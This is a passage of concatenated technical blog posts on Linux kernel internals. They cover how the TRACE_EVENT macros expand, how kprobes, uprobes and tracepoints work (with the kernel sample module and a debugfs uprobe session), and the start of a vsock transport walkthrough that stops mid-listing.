struct trace_event_raw_##call *entry; \
int __data_size; \
\
if (trace_trigger_soft_disabled(trace_file)) \
return; \
\
__data_size = trace_event_get_offsets_##call(&__data_offsets, args); \
\
entry = trace_event_buffer_reserve(&fbuffer, trace_file, \
sizeof(*entry) + __data_size); \
\
if (!entry) \
return; \
\
tstruct \
\
{ assign; } \
\
trace_event_buffer_commit(&fbuffer); \
}
</code></pre></div></div>
<p>Here define function ‘trace_event_raw_event_##call’. This function call ‘trace_trigger_soft_disabled’ to determine whether it will record data. Then ‘trace_event_get_offsets_##call’ to calculate the dynmaic data’s offset and size. Call ‘trace_event_buffer_reserve’ to reverse the space in ringbuffer. The ‘tstruct’ will assign ‘<em>_entry->__data_loc</em>##item’. Commit the ringbuffer by calling ‘trace_event_buffer_commit’.</p>
<h4> Nineth definition of 'TRACE_EVENT' </h4>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #undef __entry
#define __entry REC
#undef __print_flags
#undef __print_symbolic
#undef __print_hex
#undef __print_hex_str
#undef __get_dynamic_array
#undef __get_dynamic_array_len
#undef __get_str
#undef __get_bitmask
#undef __print_array
#undef TP_printk
#define TP_printk(fmt, args...) "\"" fmt "\", " __stringify(args)
#undef DECLARE_EVENT_CLASS
#define DECLARE_EVENT_CLASS(call, proto, args, tstruct, assign, print) \
_TRACE_PERF_PROTO(call, PARAMS(proto)); \
static char print_fmt_##call[] = print; \
static struct trace_event_class __used __refdata event_class_##call = { \
.system = TRACE_SYSTEM_STRING, \
.define_fields = trace_event_define_fields_##call, \
.fields = LIST_HEAD_INIT(event_class_##call.fields),\
.raw_init = trace_event_raw_init, \
.probe = trace_event_raw_event_##call, \
.reg = trace_event_reg, \
_TRACE_PERF_INIT(call) \
};
#undef DEFINE_EVENT
#define DEFINE_EVENT(template, call, proto, args) \
\
static struct trace_event_call __used event_##call = { \
.class = &event_class_##template, \
{ \
.tp = &__tracepoint_##call, \
}, \
.event.funcs = &trace_event_type_funcs_##template, \
.print_fmt = print_fmt_##template, \
.flags = TRACE_EVENT_FL_TRACEPOINT, \
}; \
static struct trace_event_call __used \
__attribute__((section("_ftrace_events"))) *__event_##call = &event_##call
</code></pre></div></div>
<p>Here define ‘struct trace_event_class’ named ‘event_class_##call’. and ‘struct trace_event_call’ named ‘event_#call’. The call of the class is ‘trace_event_raw_event_##call’ which is defined in the Eighth round expand. All of the ‘event_##call’ will be stored in the ‘_ftrace_events’ section.</p>
<p>This is story of ‘TRACE_EVNT’, a lot of operation just like a fierce tiger(一顿操作猛如虎). Let’s summary what we have does now.</p>
<p><img src="/assets/img/trace/1.png" alt="" /></p>
<p>In the ‘TRACE_EVENT’ we have defined a ‘trace_event_call’ and some related function and structures. The most important is ‘trace_event_class’s probe function ‘trace_event_raw_event_##call’. When the function call trace function(trace_me_silly for example), it will call the ‘tracepoint’s funcs function, this is the ‘probe’ function. In the probe function ‘trace_event_raw_event_##call’, it will construct a ringbuffer and fill the data and commit the buffer, then it will call ‘trace_raw_output_##call’ to copy the ringbuffer data to output buffer. Next let’s see how this happen.</p>
<h3> trace event init </h3>
<p>The ftrace framework is another complicated things. So here let’s just focus the trace event part.</p>
<p>Some of the important function in the trace event init process is following:</p>
<p>start_kernel()
->early_trace_init()
->trace_init()
->event_trace_enable()
->event_init()
->__trace_early_add_events()
->__trace_early_add_new_event()
->trace_create_new_event()</p>
<p>In event_trace_enable(), it iterates the ‘__ftrace_events’ section. For every ‘trace_event_call’, it will call ‘event_init’. Here we will call ‘call->call->raw_init()’. It’s trace_event_raw_init.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int event_init(struct trace_event_call *call)
{
int ret = 0;
const char *name;
name = trace_event_name(call);
if (WARN_ON(!name))
return -EINVAL;
if (call->class->raw_init) {
ret = call->class->raw_init(call);
if (ret < 0 && ret != -ENOSYS)
pr_warn("Could not initialize trace events/%s\n", name);
}
return ret;
}
</code></pre></div></div>
<p>trace_event_raw_init calls register_trace_event which will initialize the ‘trace_event’ member named ‘event’ in ‘trace_event_call’. This will insert the ‘trace_event’ in a global ‘event_hash’ hashmap.</p>
<p>event_trace_enable will also insert the ‘trace_event_call’ in the global ‘ftrace_events’ linked lists.</p>
<p>In ‘__trace_early_add_events’s call chain, there will be a ‘trace_event_file’ be created for every ‘trace_event_call’(by ‘trace_create_new_event’).</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct trace_event_file *
trace_create_new_event(struct trace_event_call *call,
struct trace_array *tr)
{
struct trace_event_file *file;
file = kmem_cache_alloc(file_cachep, GFP_TRACE);
if (!file)
return NULL;
file->event_call = call;
file->tr = tr;
atomic_set(&file->sm_ref, 0);
atomic_set(&file->tm_ref, 0);
INIT_LIST_HEAD(&file->triggers);
list_add(&file->list, &tr->events);
return file;
}
</code></pre></div></div>
<p>Later in the fs_initcall(event_trace_init). It will create the directory and file about the event.
event_trace_init()
->early_event_add_tracer()
->__trace_early_add_event_dirs()
->event_create_dir()</p>
<p>In the final ‘event_create_dir’ function, we create the direcotry and file. It may create a subsystem directory.</p>
<h3>enable trace event </h3>
<p>When we write the ‘enable’ file, the ‘event_enable_write’ will handle this.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (call->class->reg && !(call->flags & TRACE_EVENT_FL_IGNORE_ENABLE))
trace_create_file("enable", 0644, file->dir, file,
&ftrace_enable_fops);
static const struct file_operations ftrace_enable_fops = {
.open = tracing_open_generic,
.read = event_enable_read,
.write = event_enable_write,
.llseek = default_llseek,
};
static ssize_t
event_enable_write(struct file *filp, const char __user *ubuf, size_t cnt,
loff_t *ppos)
{
struct trace_event_file *file;
unsigned long val;
int ret;
ret = kstrtoul_from_user(ubuf, cnt, 10, &val);
if (ret)
return ret;
ret = tracing_update_buffers();
if (ret < 0)
return ret;
switch (val) {
case 0:
case 1:
ret = -ENODEV;
mutex_lock(&event_mutex);
file = event_file_data(filp);
if (likely(file))
ret = ftrace_event_enable_disable(file, val);
mutex_unlock(&event_mutex);
break;
default:
return -EINVAL;
}
*ppos += cnt;
return ret ? ret : cnt;
}
</code></pre></div></div>
<p>After the callchain ftrace_event_enable_disable-><em>_ftrace_event_enable_disable->call->class->reg, the ‘trace_event_class’s reg callback will be called.
This is ‘trace_event_reg’. ‘class->class-probe’ is ‘trace_event_raw_event</em>##call’. After a long callchain, ‘trace_event_raw_event_##call’ is added to the
‘tracepoint’s funcs member.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int trace_event_reg(struct trace_event_call *call,
enum trace_reg type, void *data)
{
struct trace_event_file *file = data;
WARN_ON(!(call->flags & TRACE_EVENT_FL_TRACEPOINT));
switch (type) {
case TRACE_REG_REGISTER:
return tracepoint_probe_register(call->tp,
call->class->probe,
file);
case TRACE_REG_UNREGISTER:
tracepoint_probe_unregister(call->tp,
call->class->probe,
file);
return 0;
...
return 0;
}
</code></pre></div></div>
<p>‘tracepoint_probe_register’ will be called.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int tracepoint_probe_register(struct tracepoint *tp, void *probe, void *data)
{
return tracepoint_probe_register_prio(tp, probe, data, TRACEPOINT_DEFAULT_PRIO);
}
int tracepoint_probe_register_prio(struct tracepoint *tp, void *probe,
void *data, int prio)
{
struct tracepoint_func tp_func;
int ret;
mutex_lock(&tracepoints_mutex);
tp_func.func = probe;
tp_func.data = data;
tp_func.prio = prio;
ret = tracepoint_add_func(tp, &tp_func, prio);
mutex_unlock(&tracepoints_mutex);
return ret;
}
static int tracepoint_add_func(struct tracepoint *tp,
struct tracepoint_func *func, int prio)
{
struct tracepoint_func *old, *tp_funcs;
int ret;
if (tp->regfunc && !static_key_enabled(&tp->key)) {
ret = tp->regfunc();
if (ret < 0)
return ret;
}
tp_funcs = rcu_dereference_protected(tp->funcs,
lockdep_is_held(&tracepoints_mutex));
old = func_add(&tp_funcs, func, prio);
if (IS_ERR(old)) {
WARN_ON_ONCE(1);
return PTR_ERR(old);
}
/*
* rcu_assign_pointer has a smp_wmb() which makes sure that the new
* probe callbacks array is consistent before setting a pointer to it.
* This array is referenced by __DO_TRACE from
* include/linux/tracepoints.h. A matching smp_read_barrier_depends()
* is used.
*/
rcu_assign_pointer(tp->funcs, tp_funcs);
if (!static_key_enabled(&tp->key))
static_key_slow_inc(&tp->key);
release_probes(old);
return 0;
}
</code></pre></div></div>
Linux tracing - kprobe, uprobe and tracepoint2020-08-05T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/08/05/tracing-basic
<h3> Background </h3>
<p>Linux tracing system is confused as there are many faces of tracing. There are lots of terminology around tracing such as ftrace, kprobe, uprobe, tracing event.</p>
<p>Julia Evans has written a blog <a href="https://jvns.ca/blog/2017/07/05/linux-tracing-systems/#ftrace">Linux tracing systems & how they fit together</a> to clarify these by splitting linux tracing systems into data sources (where the tracing data comes from), mechanisms for collecting data for those sources (like “ftrace”) and tracing frontends (the tool you actually interact with to collect/analyse data).</p>
<p>In this post, I will summary the mechanism of data sources. From Steven Rostedt slides <a href="https://static.sched.com/hosted_files/osseu19/5f/unified-tracing-platform-oss-eu-2019.pdf">Unified Tracing Platform</a> the event trace basics kprobes, uprobes, tracepoint.</p>
<p>In this post I will give one example of each data sources and summary the mechanism how these work in Linux kernel.</p>
<h3> kprobe </h3>
<h4> kprobe usage </h4>
<p>Following is a raw usage of kprobe, minor adjustment from kernel/sample/kprobes/kprobe_example.c</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <linux/kernel.h>
#include <linux/module.h>
#include <linux/kprobes.h>
#define MAX_SYMBOL_LEN 64
static char symbol[MAX_SYMBOL_LEN] = "_do_fork";
module_param_string(symbol, symbol, sizeof(symbol), 0644);
/* For each probe you need to allocate a kprobe structure */
static struct kprobe kp = {
.symbol_name = symbol,
};
/* kprobe pre_handler: called just before the probed instruction is executed */
static int handler_pre(struct kprobe *p, struct pt_regs *regs)
{
pr_info("<%s> pre_handler: name = %s, p->addr = 0x%p, ip = %lx, flags = 0x%lx\n",
p->symbol_name, current->comm, p->addr, regs->ip, regs->flags);
return 0;
}
/* kprobe post_handler: called after the probed instruction is executed */
static void handler_post(struct kprobe *p, struct pt_regs *regs,
unsigned long flags)
{
pr_info("<%s> post_handler: p->addr = 0x%p, flags = 0x%lx\n",
p->symbol_name, p->addr, regs->flags);
}
/*
* fault_handler: this is called if an exception is generated for any
* instruction within the pre- or post-handler, or when Kprobes
* single-steps the probed instruction.
*/
static int handler_fault(struct kprobe *p, struct pt_regs *regs, int trapnr)
{
pr_info("fault_handler: p->addr = 0x%p, trap #%dn", p->addr, trapnr);
/* Return 0 because we don't handle the fault. */
return 0;
}
static int __init kprobe_init(void)
{
int ret;
kp.pre_handler = handler_pre;
kp.post_handler = handler_post;
kp.fault_handler = handler_fault;
ret = register_kprobe(&kp);
if (ret < 0) {
pr_err("register_kprobe failed, returned %d\n", ret);
return ret;
}
pr_info("Planted kprobe at %p\n", kp.addr);
return 0;
}
static void __exit kprobe_exit(void)
{
unregister_kprobe(&kp);
pr_info("kprobe at %p unregistered\n", kp.addr);
}
module_init(kprobe_init)
module_exit(kprobe_exit)
MODULE_LICENSE("GPL");
</code></pre></div></div>
<p>After building and insmod it, the dmesg will show the message.</p>
<h4> kprobe anatomy </h4>
<p>The work flow of kprobe is as following:</p>
<ul>
<li>
<p>register_kprobe() function register a probe address(mostly a function), prepare_kprobe()->arch_prepare_kprobe(), in x86 the later will copy the instruction of probe address and store it, arm_kprobe->arch_arm_kprobe(), in x86 the later function will modify the probe address’s instruction to ‘BREAKPOINT_INSTRUCTION’(int3 breakpoint). This kprobe is inserted in ‘kprobe_table’ hash list.</p>
</li>
<li>
<p>When the probe address is executed, do_int3() will be called to handle the exception. This function will call kprobe_int3_handler(), kprobe_int3_handler() call get_probe() to find the kprobe from the ‘kprobe_table’ hash list. And then call pre_handler of the registered kprobe. The kprobe_int3_handler then call ‘setup_singlestep’ to setup single execute the stored probe address. Then return and after the int3 handler over, the original probe address instruction execution begion.</p>
</li>
<li>
<p>After the original probe instruction complete, it triggers a single step exeception, this is handled by ‘kprobe_debug_handler’. In this function, the post_handler of registered kprobe will be executed.</p>
</li>
</ul>
<p>The kretprobe is almostly the same as kprobe, in register_kretprobe(), it calls register_kprobe() to register a kprobe with the pre_handle ‘pre_handler_kretprobe’, This function will modify the normal return address to ‘kretprobe_trampoline’ address.</p>
<h3> uprobe </h3>
<h4> uprobe usage </h4>
<p>Prepare a tiny C program:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #include <stdio.h>
#include <stdlib.h>
void f()
{
printf("f() called\n");
}
int main()
{
f();
return 0;
}
</code></pre></div></div>
<p>Using objedump -S find the f()’s offset in ELF, it’s 0x64d here.
Do the uprobe as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu:~/uprobe# echo 'p /home/test/uprobe/test:0x64d' >> /sys/kernel/debug/tracing/uprobe_events
root@ubuntu:~/uprobe# echo 1 > /sys/kernel/debug/tracing/events/uprobes/p_test_0x64d/enable
root@ubuntu:~/uprobe# echo 1 > /sys/kernel/debug/tracing/tracing_on
root@ubuntu:~/uprobe# ./test
f() called
root@ubuntu:~/uprobe# ./test
f() called
root@ubuntu:~/uprobe# echo 0 > /sys/kernel/debug/tracing/tracing_on
root@ubuntu:~/uprobe# cat /sys/kernel/debug/tracing/trace
# tracer: nop
#
# entries-in-buffer/entries-written: 2/2 #P:8
#
# _-----=> irqs-off
# / _----=> need-resched
# | / _---=> hardirq/softirq
# || / _--=> preempt-depth
# ||| / delay
# TASK-PID CPU# |||| TIMESTAMP FUNCTION
# | | | |||| | |
test-17489 [005] d... 128037.287391: p_test_0x64d: (0x55f38badc64d)
test-17490 [004] d... 128038.998229: p_test_0x64d: (0x55c76884e64d)
</code></pre></div></div>
<h4> uprobe anatomy </h4>
<p>The uprobe has no separately interface exported except the debugfs/tracefs. Following steps show how uprobe works.</p>
<ul>
<li>
<p>Write uprobe event to ‘uprobe_events’. probes_write()->create_trace_uprobe(). The later function call kern_path() to open the ELF file and get the file’s inode. Call alloc_trace_uprobe() to allocate a trace_uprobe struct, the inode and offset is stored in this struct. Call register_trace_uprobe() to register a trace_uprobe. register_trace_uprobe() calls ‘regiseter_uprobe_event’ and insert trace_uprobe to probe_list. regiseter_uprobe_event() initialize the ‘trace_uprobe’ struct’s member ‘trace_event_call’ and call trace_add_event_call(). trace_add_event_call() calls __register_event() and __add_event_to_tracers(), the later will create a directory and some files(enalbe, id..) in ‘/sys/kernel/debug/tracing/events/uprobes’. Anyway when writing to ‘uprobe_events’ we just setup the structure in trace framwork.</p>
</li>
<li>
<p>When writing ‘/sys/kernel/debug/tracing/events/uprobes/p_test_0x64d/enable’, trace_uprobe_register()->probe_event_enable()->uprobe_register(). uprobe_register calls alloc_uprobe() to allocate a ‘struct uprobe’ and in this struct we store the inode and offset and calls insert_uprobe() to insert this ‘uprobe’ to ‘uprobes_tree’ rb-tree. Then register_for_each_vma() will be called to insert breakpoint(0xcc) in the current running process virtual memory.</p>
</li>
<li>
<p>When the ELF which has uprobe got executed, the ELF’s text file will be mmapped into the process address spaces and uprobe_mmap() will be called. In this function, build_probe_list() will be called to find all of the uprobe point and modify the process’ virtual memory address’s instruction to 0xcc.</p>
</li>
<li>
<p>When the program execution arrive the 0xcc, it trigger an int3 exception. In do_int3() it calls notify_die(DIE_INT3). This will call the callbacks registered in ‘die_chain’. In uprobe initialization function init_uprobes(), it registers ‘uprobe_exception_nb’, so arch_uprobe_exception_notify() will be called. uprobe_pre_sstep_notifier() will be called and set the thread flags with TIF_UPROBE. Before return to userspace exit_to_usermode_loop()->uprobe_notify_resume()->handle_swbp(), handle_swbp() will call the handler(handler_chain) and put thread to singlestep(pre_ssout).</p>
</li>
<li>
<p>After execute the original instruction, the program triggers a singlestep. In do_debug(), it calls notify_me(DIE_DEBUG) and handle_singlestep() will be called.</p>
</li>
</ul>
<h3> tracepoint </h3>
<h4> tracepoint anatomy </h4>
<p>Low linux kernel version has a standalone example of pure tracepoint, for example v3.8 has a example in samples/tracepoints directory. Of course it can’t work in currently high version because currently the tracepoint has a more connection with the
tracer(ftrace) and together called ‘trace event’ which I will talk about it in the next post.</p>
<p>The ‘DECLARE_TRACE’ and ‘DEFINE_TRACE’ is the key MACRO in tracepoint.</p>
<p>‘DECLARE_TRACE’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define DECLARE_TRACE(name, proto, args) \
__DECLARE_TRACE(name, PARAMS(proto), PARAMS(args), \
cpu_online(raw_smp_processor_id()), \
PARAMS(void *__data, proto), \
PARAMS(__data, args))
#define __DECLARE_TRACE(name, proto, args, cond, data_proto, data_args) \
extern struct tracepoint __tracepoint_##name; \
static inline void trace_##name(proto) \
{ \
if (static_key_false(&__tracepoint_##name.key)) \
__DO_TRACE(&__tracepoint_##name, \
TP_PROTO(data_proto), \
TP_ARGS(data_args), \
TP_CONDITION(cond), 0); \
if (IS_ENABLED(CONFIG_LOCKDEP) && (cond)) { \
rcu_read_lock_sched_notrace(); \
rcu_dereference_sched(__tracepoint_##name.funcs);\
rcu_read_unlock_sched_notrace(); \
} \
} \
__DECLARE_TRACE_RCU(name, PARAMS(proto), PARAMS(args), \
PARAMS(cond), PARAMS(data_proto), PARAMS(data_args)) \
static inline int \
register_trace_##name(void (*probe)(data_proto), void *data) \
{ \
return tracepoint_probe_register(&__tracepoint_##name, \
(void *)probe, data); \
} \
static inline int \
register_trace_prio_##name(void (*probe)(data_proto), void *data,\
int prio) \
{ \
return tracepoint_probe_register_prio(&__tracepoint_##name, \
(void *)probe, data, prio); \
} \
static inline int \
unregister_trace_##name(void (*probe)(data_proto), void *data) \
{ \
return tracepoint_probe_unregister(&__tracepoint_##name,\
(void *)probe, data); \
} \
static inline void \
check_trace_callback_type_##name(void (*cb)(data_proto)) \
{ \
} \
static inline bool \
trace_##name##_enabled(void) \
{ \
return static_key_false(&__tracepoint_##name.key); \
}
</code></pre></div></div>
<p>A tracepoint is represent by a ‘struct tracepoint’, the</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 'extern struct tracepoint __tracepoint_##name'
</code></pre></div></div>
<p>means there will be a ‘tracepoint’ definition. In fact it is defined by ‘DEFINE_TRACE’ MACRO.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct tracepoint {
const char *name; /* Tracepoint name */
struct static_key key;
int (*regfunc)(void);
void (*unregfunc)(void);
struct tracepoint_func __rcu *funcs;
};
</code></pre></div></div>
<p>‘key’ is used to determine if the tracepoint is enabled. ‘funcs’ is the array of function in this tracepoint will call.
‘regfunc’ is the callback before we add function to tracepoint.</p>
<p>Here we see the definition of ‘trace_##name’ function, this is what we used in our code.</p>
<p>‘register_trace_##name’ function will call ‘tracepoint_probe_register’ to register our ‘tracepoint’ to system. ‘tracepoint_add_func’ will be used to do the real work.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int tracepoint_add_func(struct tracepoint *tp,
struct tracepoint_func *func, int prio)
{
struct tracepoint_func *old, *tp_funcs;
int ret;
if (tp->regfunc && !static_key_enabled(&tp->key)) {
ret = tp->regfunc();
if (ret < 0)
return ret;
}
tp_funcs = rcu_dereference_protected(tp->funcs,
lockdep_is_held(&tracepoints_mutex));
old = func_add(&tp_funcs, func, prio);
if (IS_ERR(old)) {
WARN_ON_ONCE(1);
return PTR_ERR(old);
}
/*
* rcu_assign_pointer has a smp_wmb() which makes sure that the new
* probe callbacks array is consistent before setting a pointer to it.
* This array is referenced by __DO_TRACE from
* include/linux/tracepoints.h. A matching smp_read_barrier_depends()
* is used.
*/
rcu_assign_pointer(tp->funcs, tp_funcs);
if (!static_key_enabled(&tp->key))
static_key_slow_inc(&tp->key);
release_probes(old);
return 0;
}
</code></pre></div></div>
<p>As we can see it just add ‘func’ to ‘tp->funcs’, it will be ordered by the ‘prio’(in func_add).</p>
<p>Now let’s look at the ‘DEFINE_TRACE’ MACRO.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> #define DEFINE_TRACE_FN(name, reg, unreg) \
static const char __tpstrtab_##name[] \
__attribute__((section("__tracepoints_strings"))) = #name; \
struct tracepoint __tracepoint_##name \
__attribute__((section("__tracepoints"))) = \
{ __tpstrtab_##name, STATIC_KEY_INIT_FALSE, reg, unreg, NULL };\
static struct tracepoint * const __tracepoint_ptr_##name __used \
__attribute__((section("__tracepoints_ptrs"))) = \
&__tracepoint_##name;
#define DEFINE_TRACE(name) \
DEFINE_TRACE_FN(name, NULL, NULL);
</code></pre></div></div>
<p>So here we can see the ‘struct tracepoint’ has been defined and is stored in ‘__tracepoints’ section.</p>
<p>Now that we know the create of ‘strcut tracepoint’ let’s see what happend when we call ‘trace_##name’. It will
call __DO_TRACE.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static inline void trace_##name(proto) \
{ \
if (static_key_false(&__tracepoint_##name.key)) \
__DO_TRACE(&__tracepoint_##name, \
TP_PROTO(data_proto), \
TP_ARGS(data_args), \
TP_CONDITION(cond), 0); \
if (IS_ENABLED(CONFIG_LOCKDEP) && (cond)) { \
rcu_read_lock_sched_notrace(); \
rcu_dereference_sched(__tracepoint_##name.funcs);\
rcu_read_unlock_sched_notrace(); \
} \
}
#define __DO_TRACE(tp, proto, args, cond, rcucheck) \
do { \
struct tracepoint_func *it_func_ptr; \
void *it_func; \
void *__data; \
\
if (!(cond)) \
return; \
if (rcucheck) { \
if (WARN_ON_ONCE(rcu_irq_enter_disabled())) \
return; \
rcu_irq_enter_irqson(); \
} \
rcu_read_lock_sched_notrace(); \
it_func_ptr = rcu_dereference_sched((tp)->funcs); \
if (it_func_ptr) { \
do { \
it_func = (it_func_ptr)->func; \
__data = (it_func_ptr)->data; \
((void(*)(proto))(it_func))(args); \
} while ((++it_func_ptr)->func); \
} \
rcu_read_unlock_sched_notrace(); \
if (rcucheck) \
rcu_irq_exit_irqson(); \
} while (0)
</code></pre></div></div>
<p>It will call the functions in ‘tp->funcs’ array.</p>
<p>So here we have a tracepoint framework, the only is to add ‘function’ to ‘tp->funcs’, this is call ‘probe’ function. In the old days, we can use another kernel module to do this. However nowdays the tracepoint is tied with ftrace and called ‘trace event’.</p>
<p>Next post will talk about how ‘trace event’ work.</p>
Linux vsock internals2020-04-18T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2020/04/18/vsock-internals
<h3> Background </h3>
<p>VM Sockets(vsock) is a fast and efficient communication mechanism between guest virtual machines and their host. It was added by VMware in commit <a href="https://github.com/torvalds/linux/commit/d021c344051af91f42c5ba9fdedc176740cbd238">VSOCK: Introduce VM Sockets</a>. The commit added a new socket address family named vsock and its vmci transport.</p>
<p>VM Sockets can be used in a lot of situation such as the VMware Tools inside the guest. As vsock is very useful the community has development vsock supporting other hypervisor such as qemu&&kvm and HyperV.
Redhat added the virtio transport for vsock in <a href="https://github.com/torvalds/linux/commit/0ea9e1d3a9e3ef7d2a1462d3de6b95131dc7d872">VSOCK: Introduce virtio_transport.ko</a>, for vhost transport in host was added in comit <a href="https://github.com/torvalds/linux/commit/433fc58e6bf2c8bd97e57153ed28e64fd78207b8">VSOCK: Introduce vhost_vsock.ko</a>. Microsoft added the HyperV transport in commit <a href="https://github.com/torvalds/linux/commit/ae0078fcf0a5eb3a8623bfb5f988262e0911fdb9">hv_sock: implements Hyper-V transport for Virtual Sockets (AF_VSOCK)</a>, Of course this host transport is in Windows kernel and no open sourced.</p>
<p>This post will focus the virtio transport in guest and vhost transport in host.</p>
<h3> Architecture </h3>
<p>Following pics is from Stefano Garzarella’s <a href="https://static.sched.com/hosted_files/devconfcz2020a/b1/DevConf.CZ_2020_vsock_v1.1.pdf">slides</a></p>
<p><img src="/assets/img/vsock/1.png" alt="" /></p>
<p>There are several layers here.</p>
<ul>
<li>application, use <cid,port> as a socket address</li>
<li>socket layer, support for socket API</li>
<li>AF_VSOCK address family, implement the vsock core</li>
<li>transport, trasnport the data between guest and host.</li>
</ul>
<p>The transport layer is the mostly needed to talk as the other three just need to implement standand interfaces in kernel.</p>
<p>Transport as its name indicated, is used to transport the data between guest and host just like the networking card tranpost data between local and remote socket. There are two kinds of transports according to data’s flow direction.</p>
<ul>
<li>G2H: guest->host transport, they run in the guest and the guest vsock networking protocol uses this to communication with the host.</li>
<li>H2G: host->guest transport, they run in the host and the host vsock networing protocol uses this to communiction with the guest.</li>
</ul>
<p>Usually H2G transport is implemented as a device emulation, and G2H transport is implemented as the emulated device’s driver. For example, in VMware the H2G transport is a emulated vmci PCI device and the G2H is vmci device driver. In qemu the H2G transport is a emulated vhost-vsock device and the G2H transport is the vosck device’s driver.</p>
<p>Following pic shows the virtio(in guest) and vhost(in host) transport. This pic also from Stefano Garzarella’s slides.</p>
<p><img src="/assets/img/vsock/2.png" alt="" /></p>
<p>vsock socket address family and G2H transport is implemented in ‘net/vmw_vsock’ directory in linux tree.
H2G transport is implemented in ‘drivers’ directory, vhost vsock is in ‘drivers/vhost/vsock.c’ and vmci is in ‘drivers/misc/vmw_vmci’ directory.</p>
<p>Following pic shows the more detailed virtio<->vhost transport in qemu.</p>
<p><img src="/assets/img/vsock/3.png" alt="" /></p>
<p>Following is the steps how guest and host initialize their tranport channel.</p>
<ol>
<li>When start qemu, we need add ‘-device vhost-vsock-pci,guest-cid=<CID>' in qemu cmdline.</CID></li>
<li>load the vhost_vsock driver in host.</li>
<li>The guest kernel will probe the vhost-vsock pci device and load its driver. This virtio driver is registered in ‘virtio_vsock_init’ function.</li>
<li>The virtio_vsock driver initializes the emulated vhost-vsock device. This will communication with vhost_vsock driver.</li>
</ol>
<p>Transport layer has a global variable named ‘transport’. Both guest and host side need to register his vsock transport by calling ‘vsock_core_init’. This function will set the ‘transport’ to an transport implementaion.</p>
<p>For example the guest kernel function ‘virtio_vsock_init’ calls ‘vsock_core_init’ to set the ‘transport’ to ‘virtio_transport.transport’ and the host kernel function ‘vhost_vsock_init’ calls ‘vsock_core_init’ to set the ‘transport’ to ‘vhost_transport.transport’.</p>
<p>After initialization, the guest and host can use vsock to talk to each other.</p>
<h3> send/recv data</h3>
<p>vsock has two type just like udp and tcp for ipv4. Following shows the ‘vsock_stream_ops’</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static const struct proto_ops vsock_stream_ops = {
.family = PF_VSOCK,
.owner = THIS_MODULE,
.release = vsock_release,
.bind = vsock_bind,
.connect = vsock_stream_connect,
.socketpair = sock_no_socketpair,
.accept = vsock_accept,
.getname = vsock_getname,
.poll = vsock_poll,
.ioctl = sock_no_ioctl,
.listen = vsock_listen,
.shutdown = vsock_shutdown,
.setsockopt = vsock_stream_setsockopt,
.getsockopt = vsock_stream_getsockopt,
.sendmsg = vsock_stream_sendmsg,
.recvmsg = vsock_stream_recvmsg,
.mmap = sock_no_mmap,
.sendpage = sock_no_sendpage,
};
</code></pre></div></div>
<p>Most of the ‘proto_ops’ of vsock is easy to understand. Here I just use send/recv process to show how the transport layer ‘transport’ data between ‘guest’ and ‘host’.</p>
<h4> guest send </h4>
<p>‘vsock_stream_sendmsg’ is used to send data to host, it calls transport’s ‘stream_enqueue’ callback, in guest this function is ‘virtio_transport_stream_enqueue’. It creates a ‘virtio_vsock_pkt_info’ and called ‘virtio_transport_send_pkt_info’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ssize_t
virtio_transport_stream_enqueue(struct vsock_sock *vsk,
struct msghdr *msg,
size_t len)
{
struct virtio_vsock_pkt_info info = {
.op = VIRTIO_VSOCK_OP_RW,
.type = VIRTIO_VSOCK_TYPE_STREAM,
.msg = msg,
.pkt_len = len,
.vsk = vsk,
};
return virtio_transport_send_pkt_info(vsk, &info);
}
virtio_transport_send_pkt_info
-->virtio_transport_alloc_pkt
-->virtio_transport_get_ops()->send_pkt(pkt);(virtio_transport_send_pkt)
</code></pre></div></div>
<p>‘virtio_transport_alloc_pkt’ allocate a buffer(‘pkt->buf’) to store the send data’.
‘virtio_transport_send_pkt’ insert the ‘virtio_vsock_pkt’ to a list and queue it to a queue_work.
The actully data send is in ‘virtio_transport_send_pkt_work’ function.</p>
<p>In ‘virtio_transport_send_pkt_work’ it is the virtio driver’s standard operation, prepare scatterlist using msg header and msg itself, call ‘virtqueue_add_sgs’ and call ‘virtqueue_kick’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void
virtio_transport_send_pkt_work(struct work_struct *work)
{
struct virtio_vsock *vsock =
container_of(work, struct virtio_vsock, send_pkt_work);
struct virtqueue *vq;
bool added = false;
bool restart_rx = false;
mutex_lock(&vsock->tx_lock);
...
vq = vsock->vqs[VSOCK_VQ_TX];
for (;;) {
struct virtio_vsock_pkt *pkt;
struct scatterlist hdr, buf, *sgs[2];
int ret, in_sg = 0, out_sg = 0;
bool reply;
...
pkt = list_first_entry(&vsock->send_pkt_list,
struct virtio_vsock_pkt, list);
list_del_init(&pkt->list);
spin_unlock_bh(&vsock->send_pkt_list_lock);
virtio_transport_deliver_tap_pkt(pkt);
reply = pkt->reply;
sg_init_one(&hdr, &pkt->hdr, sizeof(pkt->hdr));
sgs[out_sg++] = &hdr;
if (pkt->buf) {
sg_init_one(&buf, pkt->buf, pkt->len);
sgs[out_sg++] = &buf;
}
